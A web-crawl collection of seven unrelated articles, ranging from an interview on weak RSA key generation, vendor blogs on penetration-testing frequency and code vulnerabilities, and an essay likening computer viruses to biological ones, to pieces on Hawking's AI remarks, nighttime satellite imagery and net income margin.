s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00676.warc.gz
en
0.922204
1,627
2.71875
3
Putting to Rest RSA Key Security Worries Impact on Online Transaction Seen as MinimalA recently published research paper that raised questions about the efficacy of RSA public-private key cryptography shouldn't be too concerning for IT security practitioners, says Eugene Spafford of Purdue University. And although the research has since been disputed, Spafford explains why there's still value in such a discussion. The research paper, entitled Ron was Wrong, Whit was Right, concludes that the way the RSA algorithm generates random numbers to be used in encryption keys could, in rare instances, make a secret number public. And that could create a potential vulnerability that hackers might exploit, the researchers say. Spafford says the exposed keys aren't the type that would be used by businesses such as financial institutions that conduct sensitive transactions on the Internet. What apparently happened is that some smaller organizations created their own Secure-Socket-Layer public-private-key set using software to generate random numbers, Spafford says. The smaller organizations may have used a small set of seed values that would generate the same set of large prime numbers. So what lessons can be learned from this? According to Spafford, one of the problems is with encryption, "the whole aspect of key generation and management, and that has been the case for a very long time." He argues that although security practitioners can develop and use algorithms that are effectively unbreakable, if they're unable to generate truly random keys and keep them safe from prying eyes, "then it doesn't matter how strong the algorithms really are." "There have been a number of systems that, going back in time, the generation of a key ... didn't use enough randomness and resulted in keys that were more trivially broken," Spafford says in an interview with Information Security Media Group's Eric Chabrow [transcript below]. Spafford says this kind of scrutiny and review of security systems is a necessary element in ensuring their validity. "It's important that we regularly verify our assumptions, verify that the systems we're using really work the way that they're supposed to work," he says. In the interview, Spafford: - Summarizes the problem raised in the research paper; - Evaluates the response by RSA Chief Technologist Sam Curry to the paper; - Explains why such research into possible flaws of encryption and cryptographic solutions, even when disputed, is valuable. Spafford also serves as executive director of the Purdue Center for Education and Research in Information Assurance and Security. Widely considered a leading expert in information security, Spafford has served on the Purdue computer science faculty since 1987. His research focuses on information security, computer crime investigation and information ethics. RSA Public-Key Security Issue ERIC CHABROW: Please take a few moments to summarize what you see as the problem the researchers raise in the paper entitled, "Ron was Wrong, Whit was Right," and the response by RSA Chief Technologist Sam Curry to the paper. EUGENE SPAFFORD: What the researchers found is that by collecting a very large number of existing public keys and doing some analysis, they were able to find common factors that were used in generating those keys. This is a weakness that can be exploited because if one can find those factors, it's possible to find the private keys associated with them. The conclusion that they make in the paper is that this is a fundamental weakness in using the RSA algorithm, but in reality what it demonstrates is that there are weaknesses if a random number generation mechanism that's used to generate the keys isn't really truly random. It's not so much a flaw with RSA as it is with the implementation that has been used to generate many of the keys. CHABROW: That sort of supports what RSA Chief Technologist Sam Curry said, that it's more of a process than it is actually the number generation itself? SPAFFORD: I would say that's a reasonably accurate characterization. Issues for Large Organizations CHABROW: Okay, so I'm a CSO at a bank or a hospital or a government agency and our organization uses the RSA public-key cryptography. What should I do? SPAFFORD: The follow-up that I've seen posted online and related to the paper indicates that the keys where they found difficulties were in self-signed, locally generated SSL keys or encryption keys, not the kind of keys that would likely be used at a financial institution. What appears to be the case is that some organizations generated their own SSL public-private key sets using software that had poor random number generators, may have repeatedly started from a small set of seed values and, as a result, occasionally would regenerate the same set of large prime numbers. These keys being somewhat of a problem of course are not likely used in major commercial transactions. Those keys tend to be generated using a much better random number generation system, possibly even hardware generation, and didn't appear to be among the sets of keys that were found to be vulnerable. CHABROW: What would be some of the situations an organization would use these keys that the researchers pointed out could have a flaw? SPAFFORD: This might be at an educational institution or somebody's home where they set up a web server with an SSL certificate using RSA. It could also be where somebody has generated a PGP key for themselves, again from one of these home systems with a poor generator then installed that public-key in one of the directories. There are a couple of different places where the keys could come from. At least the sources that I have been looking at, some of the analyses that have been online indicate that really high-security keys, ones that are very important to large enterprises, were not among the ones that were found to have deficient keys. CHABROW: And you're not aware of any organizations, high-end organizations, that would use the ones that were described in the paper? SPAFFORD: That's correct. Value in RSA Key Security Debate CHABROW: Is this much to do about nothing or is there some worthy discussion here? SPAFFORD: Oh, I think there are some worthy things to get out of this. One of the big problems with encryption is the whole aspect of key generation and management, and that has been the case for a very long time. We're able to develop and use algorithms that are effectively unbreakable given current technology, but unless we're able to generate truly random keys and keep them appropriately safe from prying eyes, then it doesn't matter how strong the algorithms really are. This is an example of a problem with generating a good key and having enough randomness to generate a key that can't be easily broken or doesn't possibly provide some benefit to an attacker, and we've seen this kind of problem before. There have been a number of systems that, going back in time, the generation of a key didn't use enough entropy, didn't use enough randomness and resulted in keys that were more trivially broken. I myself, with a couple of my students, found a problem with the Kerberos 4 key generation scheme about 15 years ago. That was really very similar to this same idea. CHABROW: Does this research suggest that even tried and true IT security practices must be questioned and tested periodically? Even RSA's response says although it didn't agree with the conclusions, and they sort of agreed with what you said, they liked the idea that people are spending time looking into things like this. SPAFFORD: I think it's very important. It's very easy to make assumptions about how the underlying technology works or is supposed to work. We've seen time and time again where those assumptions are incorrect possibly because whoever it was developing the code misunderstood or didn't understand these issues, and so it's important that we regularly verify our assumptions, verify that the systems we're using really work the way that they're supposed to work. Furthermore, to understand that over time because this is still a developing field, our technology gets better, our computers get faster ... and we understand some issues of algorithms better. So assumptions that were made in the past may not hold true in a future environment. That's another reason to go back and test things.
<urn:uuid:5ef0965b-17e7-4ec6-898a-63d630459f89>
CC-MAIN-2024-38
https://www.healthcareinfosecurity.com/interviews/putting-to-rest-rsa-key-security-worries-i-1395
2024-09-13T04:15:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00676.warc.gz
en
0.976967
1,705
2.765625
3
What Is the Purpose of Penetration Testing? Rather than assess potential vulnerabilities in your IT system, the penetration test acts as a cyber attack to determine how it handles your system. Professional IT professionals try to gain access to your system using a variety of methods that help identify vulnerabilities and show how those vulnerabilities can be exploited in your system. In this way, it can help with solutions to avoid the risk of a real cyber attack in the future. As an ethical hack, it is designed to provide a cyber attack test without harmful consequences. Instead, this test provides real-world data and insight into which areas are most vulnerable and how those specific areas can be used to damage your system. The main purpose of testing is to look at your activity through the eyes of an attacker and proactively prevent his attacks. Through this process, companies discover specific weaknesses in their IT systems at the time of testing. Using this understanding allows for proactive mitigation and correction of these potential abuses. Businesses should strive to protect their digital infrastructure through information obtained through necessary tests. The main goal of testing is to recruit trained people for vulnerability testing. While a secure IT network is a major advantage, other benefits offered by pen testers range from building customer trust to a healthy PR profile. With that in mind, let’s dive in and take a closer look at the purpose of testing , and examine the different value propositions that the test leads to. Regulatory Frameworks that Require Penetration Testing Due to the highly regulatory nature of some industries, such as service providers, healthcare and banks, penetration testing is necessary to ensure compliance. Here are some common rules that require penetration testing for compliance: Penetration testing is required for the initial revision of SOC 2 type II and every 180 days thereafter. SOC stands for Service Organization Control, and SOC 2 compliance is an industry standard for SOC member technology. In order to comply with SOC 2, companies must conduct a cyber security audit. This audit examines five controls known as the principles of trusted services: security, availability, processing integrity, confidentiality, and privacy. Auditors ensure that these five controls are relevant to the sector. Cybersecurity experts recommend penetration testing quarterly or twice a year as part of the SOC 2 compliance audit. Penetration testing is required at least once a year. Medical information is extremely valuable and perhaps more cost-effective for hackers than credit card information. It usually includes birth numbers, birth dates, insurance numbers, diagnostic codes, and billing information. Hackers can use this information to commit identity fraud and to protect against fraudulent regulations. It is necessary that medical institutions conduct regular pen tests to ensure that the data is safe from prying eyes. HIPAA (Health Insurance Portability and Liability Act 1996) is a U.S. federal law that regulates the privacy, security, and electronic exchange of medical information. According to HIPAA, healthcare institutions must conduct regular technological safety tests of their data. Is there a better way to test the system than to think like the person who broke it? That’s what a tester does. An independent penetration testing organization requires every 180 days. It does not have to be ASV or QSA. PCI DSS stands for Payment Card Industry Data Security Standard. It is a regulation that regulates the way users’ card data is managed. It has recently been modified to require vulnerability scanning and pencil testing. Vulnerability assessment and penetration testing must include the perimeter of the cardholder data environment (CDE) and any systems that could affect the security of the CDE in the event of a threat. Pencil tests should be performed at least once a year and every six months at the supplier. When to Perform a Pen Test First, the organization must understand that the penetration test is not a one-time activity. The cyber threat environment is constantly changing. New vulnerabilities are constantly emerging, and for every cybercriminal who hangs his shoes (you can always hope!), Three more jump in. That is why it is important to set temporary “target places” that will guide the organization’s strategy for testing the pen. Therefore, pen tests should be performed whenever the following situations occur: - New components or applications added to the IT infrastructure - Significant changes or updates to the infrastructure, even if no other components have been added - Security patches applied to antivirus software or firewalls - Acquisitions and mergers of companies (must be completed before the acquisition or merger) Almost all organizations experience such situations during their business, so pen tests are key to maintaining a strong security position. 5 Signs That it’s Time for Penetration Testing - After Launch – IT teams often work with impossible deadlines and are forced to issue applications, systems, or services without proper security assessment. When systems are new, they usually have security holes and security vulnerabilities that penetration tests can detect. - After Significant Changes Are Made to the Environment –These major changes in the IT infrastructure create vulnerabilities that automated scanners can ignore. Through security penetration testing, organizations can identify any security breaches or misconfigurations or logical errors that may result from such major changes. Organizations typically continue to make rapid changes in their system, infrastructure, and technology to be agile and keep up with ever-changing technologies. These rapid changes inadvertently create gaps and weaknesses in the IT infrastructure that can be exploited. Last year, however, a global pandemic swept the organization and forced them into digital transformation in full swing. - After Security Patches Are Applied – Security patches are fixes for previously released software designed to fix bugs / vulnerabilities / security holes. Because patch information is publicly available, attackers are often prone to reading and finding ways to break patches and related vulnerabilities. Although many organizations do not apply patches, it is not uncommon for attackers to take advantage of fixed vulnerabilities. Therefore, it is not recommended to apply security patches to all devices as they appear, regardless of their impact, nor is it recommended to completely ignore security patches. - After a Policy Is Modified – The security policies of the company, end users and information affect the security position of the organization. The principles of information security form the core of functional security and define the scope and activities of the organization’s security management system. Major changes in security policies are affecting the IT environment and therefore require extensive security penetration testing. They provide insight into newly defined information security systems. Changes to company and end-user policies can create vulnerabilities and logical errors that cannot be detected by scanning tools and simple vulnerability assessments. Pencil tests are crucial in recognizing such inaccurate configurations and logical errors. - If Your Industry Is Regularly Targeted – If you’ve received warnings about sophisticated and sophisticated cyberattacks targeting your industry, it’s time to get involved in security penetration testing. This could be due to technological or regulatory changes in the industry or other factors causing an increase in the offensive area. Ensure you are fully prepared for a penetration test by reviewing our comprehensive penetration testing questionnaire. How Often Should Pen Testing be Done? Penetration testing should be conducted regularly (at least once a year) to ensure more consistent IT and network security management that reveals how malicious hackers can exploit recently discovered threats (0 days, 1 day) or emerging vulnerabilities. In addition to regularly scheduled inspections and evaluations required by regulations such as the GDPR, PCI-DSS testing must also be conducted whenever: - A new infrastructure or network application has been added - Significant updates or changes are applied to the infrastructure or applications - New offices are being set up - Security patches have been applied - End-user policy is changing. Is It Time for Your Organization to Get Tested? I.S. Partners can perform penetration testing that simulates an actual attack by a hacker. Request a quote today to get started.
<urn:uuid:d52c3248-2bb0-446d-ba5e-18b46c3c4690>
CC-MAIN-2024-38
https://www.ispartnersllc.com/blog/penetation-testing-frequency/
2024-09-13T04:26:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00676.warc.gz
en
0.936608
1,595
2.9375
3
Stephen Hawking believes AI could be mankind's last accomplishment According to Stephen Hawking, artificial Intelligence (AI) and its possible implementations need to be managed with the utmost care in order to prevent its power from falling into the wrong hands or being used in a way that does not benefit mankind as a whole. The renowned physicist stressed the point that AI could be used to commit deplorable acts in the form of powerful autonomous weapons and other ways in which people in power could use the technology to oppress and control a majority of the population. Hawking even went so far as to suggest that the creation of AI could potentially end up being the last accomplishment of mankind if we do not learn to understand the risks associated with it. However, he also believes that the technology could be extremely beneficial to the world and could be used to stop the spread of disease and poverty. On Wednesday, at the opening of the new Leverhulme Centre for the Future of Intelligence (LCFI) at Cambridge University, Hawking offered further insight into his thoughts regarding both the positive and negative implications of creating a true AI, saying: "We spend a great deal of time studying history, which, let's face it, is mostly the history of stupidity. So it's a welcome change that people are studying instead the future of intelligence". "The potential benefits of creating intelligence are huge... With the tools of this new technological revolution, we will be able to undo some of the damage done to the natural world by the last one -- industrialization. And surely we will aim to fully eradicate disease and poverty. Every aspect of our lives will be transformed. In short, success in creating AI, could be the biggest event in the history of our civilization. But it could also be the last, unless we learn how to avoid the risks. Alongside the benefits, AI will also bring dangers, like powerful autonomous weapons, or new ways for the few to oppress the many. It will bring great disruption to our economy", adds Hawking. Hawking concluded his speech with the notion that "AI will be either the best, or the worst thing ever to happen to humanity. We do not yet know which". Hawking has previously criticized AI, but now as we are approaching its potential reality he has become more receptive to the technology and the advances it could bring. Published under license from ITProPortal.com, a Future plc Publication. All rights reserved.
<urn:uuid:40ee4901-6d78-4a83-987b-cca1adb4815f>
CC-MAIN-2024-38
https://betanews.com/2016/10/21/artificial-intelligence-stephen-hawking/
2024-09-14T11:38:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.22/warc/CC-MAIN-20240914093425-20240914123425-00576.warc.gz
en
0.966036
492
2.5625
3
Net Income Margin (also referred to as return on sales or net profit margin) measures how much profit a company makes for each dollar in revenue. While the net profit will give us the actual amount of money earned, the net income margin gives us a percentage. This in turn provides us with a measure we can now use to compare companies or business units. Net income margin is an important indicator measuring how efficient a company (or business unit) is and how well it is able to control its costs. Net Income Margin = (Net Income/ Revenues) x 100 This indicator is included in the book: Key Performance Indicators – the 75+ measures every manager needs to know, which contains an in-depth description of this KPI, as well as practical advice on data collection, calculations, target setting, and actual usage.
<urn:uuid:938a9f43-2738-4207-92f5-2c2740cdfdce>
CC-MAIN-2024-38
https://bernardmarr.com/net-income-margin/?paged1223=4
2024-09-16T23:56:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00376.warc.gz
en
0.93883
172
2.859375
3
Eleanor Stokes, a senior scientist on the University Space Research Association's Earth from Space Institute in Columbia, Maryland, shared more details on the ... Studying nighttime images of the Earth taken from satellites could go a long way toward building policymakers understanding of disasters around the world and how to manage risks. That’s according to the UN’s latest Global Assessment Report on Disaster Risk Reduction. Eleanor Stokes is a contributing author to the report, who also helps lead the science team for a project called Black Marble. A joint effort by NASA and the University Space Research Association captures nighttime data around the globe every single night. Stokes is a senior scientist at USRA’s Earth from Space Institute in Columbia, Maryland, and she joined the Federal Drive with Tom Temin to share more. Jared Serbu: Dr. Stokes, thanks for being here. Let’s, if you could start us off with a little bit of an introduction into what the Global Assessment Report is and tries to do for policymakers around the world. And then we’ll talk a little bit more about what Black Marble can do to help inform all those efforts. How does broad area management inform national security? Find out in our new briefing, sponsored by Planet. | Download today! Eleanor Stokes: Sure. The Global Assessment Report is a report on disaster risk reduction. It comes out every two years, and it’s exploring how systemic risk in the world has changed over time and what the current state of risk is. It’s put out by the UN. And it’s sort of similar to the IPCC for climate change. But this is focused more on disaster risk. Jared Serbu: And unless I’m wrong, I think it actually deliberately excludes the effects of climate change, right, and tries to describe risk over and above what climate change might actually be doing in certain areas. Do I have that right? Eleanor Stokes: Well, they’re sort of intermingled because it talks a lot about disasters and how disasters change because of climate change, their prevalence and their intensity. But it’s not just looking at how the physical disasters might change, but how the whole system might be affected. So the socioeconomic systems that are affected by that or the infrastructures, how we have changed the way we are exposed to those risks. So yeah, it’s not just about climate change, though, that is certainly one of the risks that it’s considering. Jared Serbu: Got it, okay. So tell us a bit about Black Marble, the kinds of data you collect, and how that might inform efforts that are kind of described in that risk risk reduction report? Eleanor Stokes: Sure. Black Marble is a project that NASA has funded. It’s a satellite data set, that is imaging the world at night since 2012, on a daily basis. And it’s really different from a lot of other satellite datasets, because at night, you can imagine you’ve probably seen these images that come up, usually before Hollywood movies of the world at night. The thing that really pops out is human settlements in that satellite data set. So what we’re able to see is things like electricity, infrastructure, roads, how populations might be moving or migrating, things like conflicts, electricity, reliability, and, and also how disaster affects all of those things. So it’s truly a human satellite, it’s focused on us as opposed to on the natural systems that support us and the other species that live on the planet. The reason Black Marble is so useful to this report is it starts to incorporate these physical models of of climate change and climate disasters with the social models of the impacts on humans and on cities. And so when you start to really do some data fusion between the satellite data we’ve had for years from the natural world with the human world, you really start to get a strong understanding of how risk is going to propagate to affect different parts of our economic and social system. Jared Serbu: And I think you’re able to look at both long term and short term effects, right? I mean, things like long term migration patterns, and power outages. I think the report specifically talks about how Black Marble was used in the aftermath of the hurricanes in Puerto Rico. Eleanor Stokes: That’s right. So yeah, I mean, one of the really cool things about satellite data that’s really well known is that we always shoot for a long-term record. So Black Marble has now been collecting data since 2012. It will continue to collect data for at least another decade. And so that’s like a long term record that we can rely on. But in addition, it’s collecting data on a daily basis. So we get to see short term changes, like how disasters might affect power outages. We’ve looked at New Orleans after different hurricanes. We’ve looked at the Texas outage that happened with the winter, Cyclone Fani. There’s a lot of impacts that are hard to understand the distribution of or study with just information from the power sector, or from producers of electricity because that data is often held within one district. So if you have a utility provider, they have a certain boundary that they care about. But the satellite data has no boundary, globally, across different utility providers’ domains and understand these outages at a very high resolution, spatial resolution. So neighborhood scale. Jared Serbu: And now that we, let’s focus on the long term for a second here. Now that we do have a decade’s worth of data, can you give us some examples of the sorts of insights you’ve been able to generate over that longer period? Eleanor Stokes: Sure, yeah, there’s a whole world of scientists that use this data. So I’m not the only one, we’re really the producers. And we try to get this out into the hands of scientists. But people have looked at how light pollution for example, and maybe more to the big data gaps that are out there, we have very little data about electricity reliability, like how often people have access to electricity. So this is one of the first chances we’re having to create a global dataset on electricity reliability, we’re working with the World Resources Institute, to do this to create this global data set that will be used by utilities all across the globe, who are trying to build out solar and other sorts of energy infrastructure for populations that need energy. Jared Serbu: Yeah, and I would imagine that reliability data is especially helpful in some underdeveloped areas where maybe the local utility is not so great at keeping track of the data itself. Eleanor Stokes: Exactly. And actually, the utility most utilities don’t have that data because they require smart meters. So you have, like a two-way feedback from the homes that lose the power to the utility central provider. So this is going to be helpful to them, have been able to invest in that kind of high tech technology. Jared Serbu: And thinking back on the history of Black Marble, where these sorts of uses what USRA and NASA had in mind when the project was first launched, or are people just kind of constantly discovering new use cases for it? Eleanor Stokes: No, it’s a great question. And the answer is absolutely not. This is the reason that black marble exists is really to image clouds. And for meteorological models. So weather drives that sensor and that satellite. So this is kind of a side benefit of having the sensor. But we’ve found, since having it in place, how useful it is for all of these other disciplines of science, and so now we’re trying to create the case to really have even more high temporal nighttime images to understand these short-term things like even traffic or migration patterns. Things that happen on a sub-daily basis, you can’t see. And right now, the sensor overpasses up around 1am. So we’re missing much of the human signal that that you could potentially see at like, say 9pm. So there’s definitely ways to improve our science around some of these questions. But so far, it hasn’t been the major priority that drives the launches. Jared Serbu: Yeah. Is there now that all these uses have been discovered? Is there planning underway to launch something that’s actually purpose built together? To gather this imagery, maybe at a higher resolution than we could have done in 2012? Eleanor Stokes: Yeah, you’re speaking to my dream. I think, I wouldn’t say plans but I would say there’s lots of discussions, and a lot of the land science community has put out reasons why we need this. And I think NASA is sort of weighing all their different priorities. And ESA, the European Space Agency, is also considering launching a sort of nighttime sensor, as is DLR, which is the German space agency. So right now we’re like the only one that has a publicly available nighttime sensor for use at this high resolution. But certainly other countries and other regions will catch up. Copyright © 2024 Federal News Network. All rights reserved. This website is not intended for users located within the European Economic Area. Tom Temin is host of the Federal Drive and has been providing insight on federal technology and management issues for more than 30 years.
<urn:uuid:6a313f10-b782-40f3-a34c-3a47e430b397>
CC-MAIN-2024-38
https://federalnewsnetwork.com/technology-main/2022/06/nighttime-satellite-images-may-shed-light-on-world-disasters-help-mitigate-risks/
2024-09-16T23:51:55Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00376.warc.gz
en
0.952673
2,009
3.109375
3
What is biomimicry? Biomimicry is a tool which can be used while seeking innovation. The concept is that nature has already solved many design problems through the process of evolution. Living things that are still extant have received bits and bytes of code in the form of genetic material and when this information interfaces with the environment, sustainable life forms emerge. Animals, plants, viruses, and bacteria adapt by engineering themselves over the billions of years that life has existed on Earth. The Biomimicry Institute provides numerous examples. Neural networks mimic Nature’s system of a syncytium of nerves to create a mathematical system useful to solve nonlinear problems. Another example of biomimicry given by the Institute of the same name is that of the Murray effect, demonstrated in the veins of leaves and arteries of animals. Murray, an early 20th century physiologist described a formula for the radius of first and successive order branches to maximize conductance of fluid. Flow of fluid in the veins of leaves is important for transport of water, nutrition, and gases, so is an obvious object of study. Leaf venation has evolved over time in response to environmental conditions. This is an example of the genetic code (bits & bytes) being transmitted selectively according to environmental pressure. Dicotyledon leaf venation has many closed loops which are able to carry fluid in the event of damage to other veins including, the central ones. This type of redundancy is built into retinal blood vessels and it has been postulated that it might make for better water and electricity distribution networks, too. Could such a system of reticulating, interconnected, looping pathways build redundancy which allows digital systems to be more resistant to attack? Parenthetically, stoma to various pathways could open and close (like vacuum tubes, zeros and ones, ons and offs) in response to the amount of fluid in the environment. Could we use biomimicry to make digital systems better able to respond to fluctuations in demand? What are real world viruses? Viruses are packets of DNA or RNA and protein. They cannot live by themselves but must invade living cells like bacteria or animal cells where they can take over those cells to reproduce. Viruses have a genetic code and can evolve just like single or multiple cell organisms can. Typically, viruses have a nucleic acid genome, a capsid, and an envelope. The capsid surrounds the DNA or RNA and is made of proteins that are, in fact, encoded by the virus’s genetic material. Some viruses have envelopes which are bits of lipid taken from the host cell when the viruses are extruded. Although viruses have many characteristics of a living life form because they carry genetic material can replicate and undergo natural selection, they do not have a cell structure, which is been considered an import important characteristic of life. They are somewhat like a disembodied bot. Viruses are called virions and they can spread to human cells through various vectors such as blood sucking insects, the fecal-oral route, sexual contact, or airborne particles from sneezing. This is roughly analogous to a computer virus spreading through the internet or through a thumb drive or an unsuspecting host opening a malicious email. The body’s own immune response and antiviral medication are roughly analogous to cyber security. The genetic code which animates viruses is carried on strands of DNA or RNA which carry four types of nucleic acids-guanine, cytosine, thymine, and adenosine, which give cells the instructions they need to make proteins responsible for cell function. How they do this may provide important lessons for computer scientists. Moreover, microbiologists I have much to learn from the computer lab. Computational biology may be a discrete enhancement to conventional thinking. It could be called a form of biomimicry when computer antibodies against computer viruses are induced. Digital ants can swarm to and isolate digital threats. What are computer viruses? When comparing a CPU and biological virus, a computer virus, is very similar to a flu virus, and is designed to spread from host to host. The virus has the capability to replicate itself. Likewise, the same way that human viruses cannot reproduce without a host cell, computer viruses cannot reproduce and spread without programming such as a URL click, network access, or a file. Obviously, a computer virus isn’t like the flu where it’s transmitted from computer to human and vice-versa. This kind of virus is a malicious program written to destroy, alter, compromise or steal data. Additionally, many viruses are written to spread from one computer host to another. These virus programs function by inserting or attaching themselves to a valid program or file. Biological viruses, such as influenza are known to transform upon replication. When a virus performs this replication, it mutates itself. This behavior is very similar to the way some computer viruses work. So, while the headline states “Are Computer Viruses a Form of Biomimicry”, it could be argued yes. Especially with the advancement of military-grade malware from foreign governments using sophisticated algorithms and artificial intelligence. On the flip side of this discussion, biomimicry does study strategies used by nature to solve technological dilemmas facing us in the current times. Could biomimicry be used for both good and evil. The answer is yes. Several universities in the United States and abroad, have been inventing ways that software will mimic biological immune systems. The software would screen a computer network for irregularities, then isolate the infectious computer virus and develop software in real time to fight it. If you think about it, this software will create a sort of computer “antibody”. Halt and catch fire (HCF), above and beyond referring to the movie of that same name, refers to code that will freeze a processor. This is clearly analogous to apoptosis, programmed cell death. A defect in the genetic code can prevent apoptosis (prevent HCF) and cells freed from programmed cell death become cancer cells. Essers, in an article in CIO magazine discusses the potential convergence between computer and real-world viruses. He points out that there is already man machine symbiotes (cyborgs) such as humans with permanent pacemakers. Clearly with the advent of the internet of medical things a digital virus could have a malicious effect on a permanent pacemaker. We believe that blockchain may be an important way of establishing the provenance of an instruction sent to a permanent pacemaker or other mission-critical device. The author points out that the HIV virus suppresses the host immune response and makes the host more vulnerable to attack by other foreign invaders. This is akin to a denial of service attack. Applying the principles of biomimicry, we feel that this is analogous to a defect in a mismatch repair gene as seen in lynch type 1 and lynch type 2 hereditary nonpolyposis colon cancer and family cancer syndrome. Biomimicry is a powerful tool for engendering innovation in computer science and it seems logical that computational biology can facilitate understanding of living organisms. It will be only a matter of time until we see the true potential of digital biomimicry.
<urn:uuid:6e8d3a24-bf56-42d8-88ed-ecb446bf2fef>
CC-MAIN-2024-38
https://coruzant.com/security/are-computer-viruses-a-form-of-biomimicry/
2024-09-19T10:26:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00176.warc.gz
en
0.945447
1,485
4.15625
4
Code Exposure: The Vulnerabilities in Your Code & Where They Originate Typical software applications are comprised of two types of code: custom code created by your internal development teams, and third-party code – often open source – created outside the organization. Until about 10 to 15 years ago, almost all software was custom code, and every line of software was created and tested by in-house software teams. Third-party code from vendors, and in particular open-source software, wasn’t trusted. Regardless of the source, there are vulnerabilities in nearly every piece of code – which we at Checkmarx call, code exposure. Software security solutions that include application security testing (AST) manage and measure your overall Software Exposure, which helps you accurately understand and significantly reduce your organization’s business risk. One component of software exposure includes the concept of code exposure as shown in the graphic below. This concept raises the question of, “Have we identified critical vulnerabilities in our software – both custom code & open source?” What Are Vulnerabilities? Vulnerabilities are weaknesses in software that can often be exploited by threat actors. Most vulnerabilities occur during the design and coding phase of the Software Development Life Cycle (SDLC). These vulnerabilities are the result of several factors to include design errors, coding errors, and the use of open-source components with known vulnerabilities. Another significant contributing factor to developers introducing vulnerabilities is due to code complexity. Organizations with very large software applications typically do not have one person on staff that understands the entire code base, which can contribute to the propagation of security issues throughout a code base. Vulnerabilities Due to Coding Errors Software developers work from a specification describing what the software is intended to do (for example, when button A is pressed, display Account Information). Developers use functional requirements as the blueprint for their work. If a functional requirement doesn’t perform as specified, a functional “bug” is recorded. Security bugs or defects can occur when features aren’t implemented properly. For example, when button A is pressed, information on all accounts is displayed. Or the feature works, but it can be manipulated by threat actors to gain access to privileged information. Security must account for unforeseen misuse cases that cause the application to “break”, or otherwise perform in unintended ways. The security of software is usually not part of the functional specification, and just having a requirement that the software be “secure” doesn’t count. Software developers have traditionally been measured on a functional basis. If they delivered features on time, they were doing their jobs right. Security was never considered until about 20 years ago, and secure coding is still rarely taught in computer science programs. Lack of Focus on Security, Leads to Code Exposure One source of code exposure is mistakes or weaknesses created by developers in custom software when they’re writing code. These weaknesses are often derived from poor coding behaviors, habits, and policies, or they are due to an ever-changing threat landscape or characteristics of various coding languages. Threat actors focus their efforts on finding these weaknesses and exploiting them, often to their financial benefit. The most common weaknesses (or software errors) are enumerated in the OWASP Top 10 and the SANS Top 25. Vulnerabilities from Third-Party Components The adoption of open-source components by software development teams dramatically changed the software industry. Instead of building all software “from scratch”, organizations use open-source components to provide common or repetitive features and functionalities. This limits the use of custom code to proprietary features and functionality. As a result, developers spend their time on key differentiators, rather than recreating common features. The adoption of open source by nearly all industries has fueled increases in open-source development. Many large organizations, such as Microsoft, have embraced open source, and millions of open-source projects are available to developers to both use, and contribute to. Open-source software is still software and it’s exposed to coding errors that can result in security vulnerabilities. Large numbers of newly discovered vulnerabilities are disclosed in open-source software every year. These vulnerabilities are typically reported in a responsible manner, accompanied by a patch or updated version that fixes the vulnerability, making remediation of vulnerable components relatively easy. Remediating Vulnerable Components It’s not always simple to remediate “the usage” of a vulnerable open-source component, however. First, you must have visibility of where open-source components are used. Unfortunately, many organizations don’t track their usage of open source – or they track them in a static, outdated spreadsheet. The average application includes hundreds of unique open-source components, and developers download and keep those components in their workspaces for years. As these components age, the chance that vulnerabilities have already been discovered and disclosed in them increases. With hundreds of poorly tracked components, and lots of new vulnerabilities each year, many organizations are exposed to potential exploitation. Attackers are well aware that these open-source components are often poorly tracked and maintained. Identifying Code Exposure for Custom Code Fortunately, there are solutions that help identify code exposure. Start by analyzing the software your organization creates internally, and choose a complete application security testing solution that integrates with Continuous Integration (CI) servers as well as the developers’ integrated development environment (IDE). Static Application Security Testing (SAST) and Integrated Application Security Testing (IAST) solutions are a must have. These solutions help you identify coding errors in custom code so you can find vulnerabilities early in the SDLC. It’s also important to configure your security solution to test for specific types of weaknesses or errors, such as those listed in the OWASP Top 10 or SANS Top 25. Of course, those aren’t the only vulnerabilities to worry about, so it’s helpful to be able to test more broadly in all cases. Identify Code Exposure in Third-Party Code Today, the average application is mostly open source. Software composition analysis demonstrates that today’s applications are comprised of more than 80% of open-source components within the code base. The adoption of Linux as an enterprise-class operating system, Java as primary development language, and Apache Struts as an MVC framework have increased confidence in open-source components. Since open-source components have become the building blocks for modern applications, identifying code exposure in third-party components has become an essential part of any software security program. You need a solution that mitigates code exposure from third-party components by scanning builds to identify all open-source components used. Look for solutions that provides a list of any publicly reported vulnerabilities in those components, accompanied by remediation advice for using updated versions or patches for those vulnerabilities. It’s essential that your software security solutions are integrated into build processes, then reviewed and acted upon with every build. Resolve Code Exposure Incorporate application security testing (AST) solutions throughout your SDLC to manage risks inherent to code exposure. Here are some key software security solutions that can help your team resolve code exposure: Static Application Security Testing What to look for: ability to automatically scan uncompiled/unbuilt code and identify security vulnerabilities in the most prevalent coding languages. Interactive Application Security Testing What to look for: ability to continuously monitor application behavior and find vulnerabilities that can only be detected on a running application. Open Source Analysis What to look for: ability to enforce open source analysis as part of the SDLC and manage open-source components while being able to ensure that vulnerable components are removed or replaced before they become a problem. Developer Software Security Education What to look for: an interactive, engaging software security training platform integrated into the development environment, sharpening the skills developers need to avoid security issues, fix vulnerabilities, and write secure code. Professional & Managed Services What to look for: a trusted team of advisors who can help development organizations transform their DevOps initiatives by adding security throughout their SDLC. With the information these software security solutions provide, your team can prioritize issues properly and resolve them in a timely manner. Unify your software security into a single, holistic platform to manage your software exposure. Learn how here.
<urn:uuid:5649eda3-2593-419e-b9fb-1f9cfa546776>
CC-MAIN-2024-38
https://checkmarx.com/blog/code-exposure-vulnerabilities-in-your-code/
2024-09-20T16:42:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00076.warc.gz
en
0.942101
1,703
2.96875
3
